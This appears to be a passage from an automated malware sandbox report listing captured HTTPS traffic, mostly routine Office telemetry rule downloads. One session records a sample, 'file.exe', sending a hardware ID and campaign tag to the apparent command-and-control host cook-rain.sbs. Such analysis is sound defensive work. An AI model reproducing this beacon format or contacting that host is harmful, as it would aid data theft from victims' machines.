                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      22192.168.2.74972613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:32 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:33 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                      x-ms-request-id: 7511ce5b-801e-0083-468c-3af0ae000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164133Z-r1d97b99577dd2gchC1TEBz5ys00000008w000000000q2gn
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      23192.168.2.74972813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:32 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:33 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                      x-ms-request-id: 0bcc5563-701e-0021-03f3-3a3d45000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164133Z-185f5d8b95cp7lkfhC1NYC7rpw0000000ag000000000zgxp
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      24192.168.2.74972713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:33 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                      x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164133Z-185f5d8b95c5lcmhhC1NYCsnsw0000000ahg00000000m9c7
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      25192.168.2.74972913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:33 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 464
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                      x-ms-request-id: 302bdaed-601e-003e-338c-3a3248000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164133Z-185f5d8b95c9mqtvhC1NYCghtc0000000am000000000bryz
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      26192.168.2.749730104.21.66.384437476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:34 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=MQNTZN1GGB8SA
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 1221
                                                                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                                                                      2024-11-20 16:41:34 UTC1221OUTData Raw: 2d 2d 4d 51 4e 54 5a 4e 31 47 47 42 38 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 32 32 38 38 35 46 32 31 41 36 46 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4d 51 4e 54 5a 4e 31 47 47 42 38 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 51 4e 54 5a 4e 31 47 47 42 38 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4d 51 4e 54 5a
                                                                                                                                                                                                                      Data Ascii: --MQNTZN1GGB8SAContent-Disposition: form-data; name="hwid"F5D22885F21A6F1063CFCF7E6C45F838--MQNTZN1GGB8SAContent-Disposition: form-data; name="pid"1--MQNTZN1GGB8SAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--MQNTZ
                                                                                                                                                                                                                      2024-11-20 16:41:34 UTC981INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:34 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=8ooigl1li0l70h63ri1sog2git; expires=Sun, 16-Mar-2025 10:28:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyepNiphz%2FIqY0Yr16YBKq6pcN3gLcyM44SSnJqXlOQS4psrY5TZgIM7Cbs8444zdbINwhUObmdlF5dLGzwrHNZz7gthDEoi%2FxT%2FMPJP2pPzPjKgcWptAjEFs1dzv556"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8e59e3658fc00fa5-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1656&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2130&delivery_rate=1659090&cwnd=189&unsent_bytes=0&cid=cdc8062e7a51c041&ts=782&x=0"
                                                                                                                                                                                                                      2024-11-20 16:41:34 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                      2024-11-20 16:41:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      27192.168.2.74973113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:35 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                      x-ms-request-id: a1cde93a-f01e-0020-638c-3a956b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164135Z-185f5d8b95cdcwrthC1NYCy5b80000000agg00000000925m
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      28192.168.2.74973213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:35 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                      x-ms-request-id: 0f1ce2f4-701e-0001-5e8c-3ab110000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164135Z-185f5d8b95c4hl5whC1NYCeex00000000abg00000000sknc
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      29192.168.2.74973313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:35 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                      x-ms-request-id: 107b228c-c01e-00a2-1f8c-3a2327000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164135Z-1777c6cb7544nvmshC1TEBf7qc00000009h000000000yc0h
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      30192.168.2.74973413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:35 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                      x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164135Z-185f5d8b95cdh56ghC1NYCk1x400000004cg00000000739w
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
